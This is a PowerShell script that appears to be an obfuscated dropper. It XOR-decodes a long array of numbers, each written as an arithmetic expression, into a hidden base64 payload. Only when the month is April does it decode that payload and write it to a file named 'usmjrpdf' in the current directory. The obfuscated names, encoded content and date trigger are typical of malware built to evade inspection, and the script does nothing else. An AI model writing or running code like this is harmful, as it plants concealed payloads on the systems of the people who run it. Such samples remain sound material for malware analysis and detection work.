$lEEU =[inT[]]( ( 26 +51), (93- 13),(2 + 93), (35+ 84), ( 64 + 36), ( 23+20),( 73 - 6),(16 +88), (65 +34),(55+36), ( 86-2),(42- 8), ( 10+68), ( 29+ 62),(72 +23),( 73+ 8),(82+17), (18 + 73),( 25+ 88), (41 +56), (14+64), ( 76+ 19), (94+ 15),( 93+14),( 95 + 7), ( 59-17),(18 + 46),( 85+39), ( 56+ 42), (54+25), ( 31+ 13),(36 + 6),( 31+ 47),(38 + 57),( 88 -5), (67+31),( 46 +47),(94 -19), (68 + 19), ( 47+ 67), ( 42 + 52), ( 89 - 10),( 62+29), ( 84+21),(46 +32), (54 + 41), ( 7+72),( 64 + 34), (42+59),( 100 -58), ( 91- 54), (56 +68),(29 + 70),( 4+91), (57 +68), (91+28), ( 48+30), ( 23+ 72),(22 +49),(1 +118),( 16+ 78),( 76 + 3), ( 64 + 4), ( 9+ 101), (23+79),( 93 -29),(46 + 38), ( 53- 8),(40+34), (0 +76), ( 86 -22),( 20+ 27), ( 85 - 10), (71 +43),( 13 +67),(33 +10), (61+ 13), (41+34),(30 + 3), ( 67-24), ( 97-23), ( 0 +91),( 24+ 9), ( 32 + 66),(66 +8),( 91+1), ( 22 + 96),( 33 + 81),(13 +55),(71+ 56),( 25+15),( 12+26))
$gumnmo=@( (95 -88),(7+ 17),(96-75), ( 22 + 5))
$ocFopYLb = @()
FOr ( $i= 0;$i -lt  $lEEU.leNgTh; $i++) {$ocFopYLb+= $lEEU[ $i]-bxor  $gumnmo[ ($i %$gumnmo.length)]}
$ocFopYLb=([cHAr []] $ocFopYLb)-JoIN ''
FuncTIoN vKYsJWp { 
    [ CMdLeTBiNDinG()]PARam( 
        [paraMETeR (vaLUEfromPIpElINE)]
        $qdxHWXFT
    )
    iF((geT-DaTE ).MOnTH -eq 4){
        $HEjhA=[ SYsteM.COnverT]::froMbasE64sTRInG($qdxHWXFT)
        [ io.FILe]::WRITeaLLbYTEs( "$pwd/usmjrpdf" , $HEjhA )
    
    }
}
vKYsJWp -qdxHWXFT $ocFopYLb

